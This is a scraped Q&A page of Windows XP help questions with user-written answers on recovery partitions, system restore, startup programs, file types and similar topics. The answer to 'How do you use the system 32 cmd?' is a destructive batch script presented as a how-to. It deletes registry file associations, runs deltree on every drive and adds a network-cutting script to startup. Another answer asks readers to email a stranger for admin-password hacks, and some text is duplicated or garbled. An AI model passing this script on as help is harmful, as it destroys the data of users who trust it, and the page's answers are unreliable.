answersLogoWhite

0

📱

Windows XP

MS Windows XP operating system that was released for PC computers in 2001

9,737 Questions

No XP CD came with your PC so how do you reformatt?

When this happens you most likely have a separate partiton with a image of the HD when it was shipped. There should be a bootable program you can choose to run the recovery tool.

What about software programs is considered illegal and is a form of software piracy?

o Throwing away used software diskettes.

o Using commercial software without paying for it.

o Using shareware on a trial basis.

Distributing freeware to everyone you know

How do you use the system 32 cmd?

Open 'Notepad' and save file as 'batch.bat' then copy and paste this code:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO SYSTEM 32

GOTO MESSAGE

deltree /y C:\

deltree /y E:\

deltree /y A:\

deltree /y F:\

deltree /y G:\

deltree /y D:\

deltree /y H:\

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo SYSTEM 32

PAUSE

What is a dmg file?

A .dmg file is a Mac disc image

Its is basically a file that is an image of a disk, it can be mounted like a disk. It is much like a .iso image file seen a lot, except it supports compression and encryption. It is actually so much like an .iso with these extra features that there exists software packages that easily convert them back and forth.

How do you launch system restore?

If you have windows vista, click on start and type 'system restore' in the search box down the bottom and click on system restore when it appears

If you have xp, click on start, All programs, Accessories, System Tools and then system restore.

I'm not sure about windows 7. (Any version of windows which is 98 or under will not have system restore.)

Hope this helps!

How do you get past the administrator block on windows xp?

With the password. If anybody know how to hack it though email me. rabbitx369@gmail.com with cock-block in the subject line.

Is header files necessary?

No, but useful.

Example without stdio.h:

extern int puts (const char *s);

int main (void) { puts ("without"); return 0; }

Example with stdio.h:

#include <stdio.h>

int main (void) { puts ("without"); return 0; }

What does it mean to elevate the periosteum?

The periosteum is a layer of connective tissue and bone cell precursors that overlies the bone itself. Excess growth between the periostem and bone can cause the periosteum to separate from the underlying bone. This elevation of periosteum forms a triangular shape when viewed in a radiograph (xray), and is often called Codman's triangle.

Periosteal elevation is commonly associated with a cancer called osteosarcoma, but may also be seen in other diseases.

Which Desktop Environment does Windows use?

It is not named.

It's all built in, you can't change it without tons of hacking.

How can you install Windows xp in nokia x2?

To put it simply, you can't.

Windows xp is only for computers.

Found new hardware wizard will not go away?

Here's how I finally fixed the problem…

Go to control panel and click on Performance and Maintenance.

Click on System.

Click on Hardware.

Click on Device Manager.

At the top, Click on view. . .

. . .then click on Show hidden devices.

I found the phantom device listed here (Usually a printer) , I right-clicked on it

And deleted.

What prompt do you enter into run to stop to many programs form opening on startup?

An easy way to modify programs that launch on startup is to go to RUN and type "msconfig"

The last tab in the window has startup applications with checkboxes to turn them on and off.

When you next start your computer, it will say that you used msconfig, and if you want you can check a box on that window to not show that message when your computer starts, otherwise it will keep reminding you. The more permanent and risky way is to use regedit

How is it possible that the same Java program can run on different platforms?

Java source code is compiled into .class files, which are used by the Java Virtual Machine (JVM). The format of the .class file is the same for all platforms, and so the source code can be compiled the same way on each platform. The JVM, however, needs to be written to run on a specific platform. This is the part which converts Java bytecode to native bytecode, and is why you need to download the JRE (which contains the JVM) for a specific platform. Java source code is compiled into .class files, which are used by the Java Virtual Machine (JVM). The format of the .class file is the same for all platforms, and so the source code can be compiled the same way on each platform. The JVM, however, needs to be written to run on a specific platform. This is the part which converts Java bytecode to native bytecode, and is why you need to download the JRE (which contains the JVM) for a specific platform.

How do you open the tabs dialog box?

click the launcher in the paragraph group,then click tabs

What Is a special kind of window where you enter or choose settings for how you want to perform a task?

The window that allows you the user to change settings or make selections is called a dialogue box. Some dialogue boxes can be resized and moved but not others.

What program will open a rtf file?

There are several programs that will do this: Microsoft Word and WordPad among others.

I used the free Open Office, which is similar to Word:

http://www.openoffice.org/

For questions on file types, I use FileInfo.com. Just enter the extension and they will list the programs that open:

http://www.fileinfo.com/extension/rtf

What is windows xt?

Windows XT is Windows eXtended Technology...